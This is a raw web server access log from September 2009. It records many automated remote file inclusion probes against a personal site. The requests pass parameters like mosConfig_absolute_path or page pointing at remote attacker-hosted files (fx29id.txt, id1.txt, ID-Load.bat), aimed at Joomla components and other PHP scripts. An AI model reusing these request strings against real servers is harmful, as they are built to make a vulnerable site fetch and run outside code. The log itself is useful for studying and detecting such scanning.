210.98.146.166 - - [16/Sep/2009:09:41:58 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sunshinestephie.com/modules/ID-Load.bat??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
210.98.146.166 - - [16/Sep/2009:09:42:48 -0700] "GET /logs/access_080222.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sunshinestephie.com/modules/ID-Load.bat??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
118.45.190.166 - - [16/Sep/2009:09:42:53 -0700] "GET /logs/access_090610.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:09:42:54 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:09:42:54 -0700] "GET /logs/access_090521.log%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:09:42:54 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:09:43:43 -0700] "GET /services.php?page=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:09:43:45 -0700] "GET /logs/access_090511.log/services.php?page=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:09:43:45 -0700] "GET /logs/services.php?page=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:09:43:45 -0700] "GET /services.php?page=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:09:43:45 -0700] "GET /logs/access_080626.log/services.php?page=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:09:43:46 -0700] "GET /logs/services.php?page=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:09:43:46 -0700] "GET /logs/access_080626.log/services.php?page=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:09:43:49 -0700] "GET /logs/access_090511.log/services.php?page=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.94.125.100 - - [16/Sep/2009:09:43:54 -0700] "GET /logs/access_090903.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.94.125.100 - - [16/Sep/2009:09:43:54 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.94.125.100 - - [16/Sep/2009:09:43:54 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:09:43:56 -0700] "GET /logs/access_080606.log%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:09:44:11 -0700] "GET /services.php?page=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:09:44:11 -0700] "GET /logs/access_090511.log/services.php?page=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:09:44:11 -0700] "GET /logs/services.php?page=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:09:44:16 -0700] "GET /logs/access_080626.log/services.php?page=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.94.125.100 - - [16/Sep/2009:09:44:16 -0700] "GET /logs/access_080623.log/services.php?page=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.94.125.100 - - [16/Sep/2009:09:44:22 -0700] "GET /logs/access_080623.log/services.php?page=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.94.125.100 - - [16/Sep/2009:09:44:25 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.94.125.100 - - [16/Sep/2009:09:44:38 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.94.125.100 - - [16/Sep/2009:09:44:38 -0700] "GET /logs/access_090903.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:09:44:48 -0700] "GET /logs/access_080626.log%20%20/services.php?page=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:09:44:56 -0700] "GET /logs/access_080626.log%20%20/services.php?page=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:09:44:56 -0700] "GET /logs/access_090511.log%20%20/services.php?page=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:09:44:57 -0700] "GET /logs/access_090511.log%20%20/services.php?page=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:09:44:59 -0700] "GET /logs/access_080626.log%20%20/services.php?page=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:09:44:59 -0700] "GET /logs/access_090511.log%20%20/services.php?page=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.48.80.22 - - [16/Sep/2009:09:44:59 -0700] "GET /logs/access_080525.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.rhythmer.net/zb41/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.48.80.22 - - [16/Sep/2009:09:44:59 -0700] "GET /logs/access_080529.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.rhythmer.net/zb41/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [16/Sep/2009:09:45:08 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.4; http://dmulk.com/blog" "dmulk.com"
222.236.47.23 - - [16/Sep/2009:09:45:11 -0700] "GET /?_PHPLIB[libdir]=http://www.graveyardzombies.org//files/id.txt? HTTP/1.1" 200 19914 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
124.217.243.81 - - [16/Sep/2009:09:46:37 -0700] "GET /logs/access_080301.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sunshinestephie.com/modules/ID-Load.bat??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:09:46:42 -0700] "GET /logs/access_080507.log/////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:09:46:43 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 200 117499 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:09:46:43 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 200 19920 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [16/Sep/2009:09:47:13 -0700] "GET /logs/access_080304.log%20%20//newspublish/include.php?path[docroot]=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:09:47:22 -0700] "GET /logs/access_081003.log/////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.18.216 - - [16/Sep/2009:09:47:26 -0700] "GET /logs/access_090319.log HTTP/1.0" 200 3314750 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
59.24.49.35 - - [16/Sep/2009:09:47:48 -0700] "GET /logs/access_080304.log%20%20//newspublish/include.php?path[docroot]=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:09:47:49 -0700] "GET /logs/access_080507.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:09:47:50 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 200 117499 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:09:47:50 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 200 19919 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.95.106 - - [16/Sep/2009:09:48:08 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://hostned.ws//sites/hardcore/v8id.gif?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:09:48:25 -0700] "GET /logs/access_081003.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [16/Sep/2009:09:48:33 -0700] "GET /logs/access_080430.log%20%20//newspublish/include.php?path[docroot]=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.11.145.8 - - [16/Sep/2009:09:48:53 -0700] "GET /logs/access_080313.log//appserv/mani.php?appserv_root=http://www.wett-profis.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.239.69.157 - - [16/Sep/2009:09:49:11 -0700] "GET /logs/access_090326.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.csjh.tpc.edu.tw/~afu//blog2/.../.../chokeng_blitars/.../revye/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.19.160.207 - - [16/Sep/2009:09:49:17 -0700] "GET /logs/access_080716.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sunshinestephie.com/modules/ID-Load.bat??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
110.137.110.44 - - [16/Sep/2009:09:49:32 -0700] "GET /logs/access_080717.log HTTP/1.0" 200 2202147 "http://www.google.co.id/url?sa=t&source=web&ct=res&cd=8&url=http%3A%2F%2Fdmulk.com%2Flogs%2Faccess_080717.log&ei=OhaxSrPPKJzQ6gPU5tDfAQ&rct=j&q=inurl%3A+CONF%5Bpath_system%5D%3D&usg=AFQjCNHnKNETYFoHm--CgGWKw5PGuEvBsg" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
124.138.115.131 - - [16/Sep/2009:09:49:33 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://NR.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.138.115.131 - - [16/Sep/2009:09:49:33 -0700] "GET /logs/access_090903.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://NR.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.138.115.131 - - [16/Sep/2009:09:49:33 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://NR.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [16/Sep/2009:09:49:36 -0700] "GET /logs/access_090617.log%20%20//inc/header.php/step_one.php?server_inc=http://www.rankkuwait.com/rankmail/copyright.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [16/Sep/2009:09:49:36 -0700] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.rankkuwait.com/rankmail/copyright.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [16/Sep/2009:09:49:36 -0700] "GET /inc/header.php/step_one.php?server_inc=http://www.rankkuwait.com/rankmail/copyright.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [16/Sep/2009:09:49:36 -0700] "GET /logs/access_090709.log%20%20//inc/header.php/step_one.php?server_inc=http://www.rankkuwait.com/rankmail/copyright.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [16/Sep/2009:09:49:36 -0700] "GET /inc/header.php/step_one.php?server_inc=http://www.tabakoff.ru//dimti/AinuLid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [16/Sep/2009:09:49:36 -0700] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.tabakoff.ru//dimti/AinuLid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [16/Sep/2009:09:49:36 -0700] "GET /logs/access_090617.log%20%20//inc/header.php/step_one.php?server_inc=http://www.tabakoff.ru//dimti/AinuLid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [16/Sep/2009:09:49:36 -0700] "GET /logs/access_090709.log%20%20//inc/header.php/step_one.php?server_inc=http://www.tabakoff.ru//dimti/AinuLid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [16/Sep/2009:09:50:14 -0700] "GET /logs/access_090709.log//inc/header.php/step_one.php?server_inc=http://www.rankkuwait.com/rankmail/copyright.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [16/Sep/2009:09:50:14 -0700] "GET /logs/access_090617.log//inc/header.php/step_one.php?server_inc=http://www.rankkuwait.com/rankmail/copyright.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [16/Sep/2009:09:50:23 -0700] "GET /logs/access_090617.log//inc/header.php/step_one.php?server_inc=http://www.tabakoff.ru//dimti/AinuLid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [16/Sep/2009:09:50:23 -0700] "GET /logs/access_090709.log//inc/header.php/step_one.php?server_inc=http://www.tabakoff.ru//dimti/AinuLid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.190.166.35 - - [16/Sep/2009:09:50:30 -0700] "GET /components/com_galleria/galleriaa.html.php?mosConfig_absolute_path=http://tvse.nl/images/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.190.166.35 - - [16/Sep/2009:09:50:30 -0700] "GET /logs/access_090223.log//components/com_galleria/galleriaa.html.php?mosConfig_absolute_path=http://tvse.nl/images/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.190.166.35 - - [16/Sep/2009:09:50:30 -0700] "GET /logs//components/com_galleria/galleriaa.html.php?mosConfig_absolute_path=http://tvse.nl/images/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.10.213.166 - - [16/Sep/2009:09:50:36 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.10.213.166 - - [16/Sep/2009:09:50:36 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.10.213.166 - - [16/Sep/2009:09:50:40 -0700] "GET /logs/access_080228.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.10.213.166 - - [16/Sep/2009:09:50:40 -0700] "GET /logs/access_080416.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.10.213.166 - - [16/Sep/2009:09:50:56 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.10.213.166 - - [16/Sep/2009:09:50:56 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.10.213.166 - - [16/Sep/2009:09:50:56 -0700] "GET /logs/access_080228.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.10.213.166 - - [16/Sep/2009:09:50:57 -0700] "GET /logs/access_080416.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
110.137.110.44 - - [16/Sep/2009:09:50:58 -0700] "GET /favicon.ico HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
195.190.166.35 - - [16/Sep/2009:09:51:22 -0700] "GET /logs/access_090609.log//components/com_galleria/galleriaa.html.php?mosConfig_absolute_path=http://tvse.nl/images/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:09:51:35 -0700] "GET /playlist.php?dir=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:09:51:36 -0700] "GET /logs/playlist.php?dir=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:09:51:36 -0700] "GET /logs/access_090123.log/playlist.php?dir=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:09:51:40 -0700] "GET /playlist.php?dir=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:09:51:40 -0700] "GET /logs/playlist.php?dir=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:09:51:40 -0700] "GET /logs/access_090123.log/playlist.php?dir=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.191.101.229 - - [16/Sep/2009:09:52:03 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.191.101.229 - - [16/Sep/2009:09:52:03 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.191.101.229 - - [16/Sep/2009:09:52:04 -0700] "GET /logs/access_080228.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.191.101.229 - - [16/Sep/2009:09:52:06 -0700] "GET /logs/access_080416.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
145.253.245.211 - - [16/Sep/2009:09:52:18 -0700] "GET /logs/access_080514.log//components/com_galleria/galleriaa.html.php?mosConfig_absolute_path=http://tvse.nl/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
145.253.245.211 - - [16/Sep/2009:09:52:18 -0700] "GET /components/com_galleria/galleriaa.html.php?mosConfig_absolute_path=http://tvse.nl/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
69.73.164.176 - - [16/Sep/2009:09:52:18 -0700] "GET /include/mail.lib.inc.php?site_path=http://bulgariaunderscope.com/root/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.73.164.176 - - [16/Sep/2009:09:52:18 -0700] "GET /logs/access_080619.log//include/mail.lib.inc.php?site_path=http://bulgariaunderscope.com/root/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.73.164.176 - - [16/Sep/2009:09:52:18 -0700] "GET /logs//include/mail.lib.inc.php?site_path=http://bulgariaunderscope.com/root/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
145.253.245.211 - - [16/Sep/2009:09:52:19 -0700] "GET /logs//components/com_galleria/galleriaa.html.php?mosConfig_absolute_path=http://tvse.nl/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:09:53:35 -0700] "GET /logs/access_080623.log/services.php?page=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
145.253.245.211 - - [16/Sep/2009:09:53:54 -0700] "GET /logs/access_080529.log//components/com_galleria/galleriaa.html.php?mosConfig_absolute_path=http://tvse.nl/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
210.98.146.166 - - [16/Sep/2009:09:54:18 -0700] "GET /logs/access_080716.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sunshinestephie.com/modules/ID-Load.bat??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
59.24.49.35 - - [16/Sep/2009:09:54:20 -0700] "GET /logs/access_080430.log%20%20//newspublish/include.php?path[docroot]=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:09:54:22 -0700] "GET /logs/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:09:54:22 -0700] "GET /logs/access_080321.log%20%20/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:09:54:22 -0700] "GET /components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:09:54:23 -0700] "GET /logs/access_090216.log%20%20/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:09:54:25 -0700] "GET /components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:09:54:25 -0700] "GET /logs/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:09:54:25 -0700] "GET /logs/access_080321.log%20%20/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:09:54:27 -0700] "GET /components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:09:54:27 -0700] "GET /logs/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
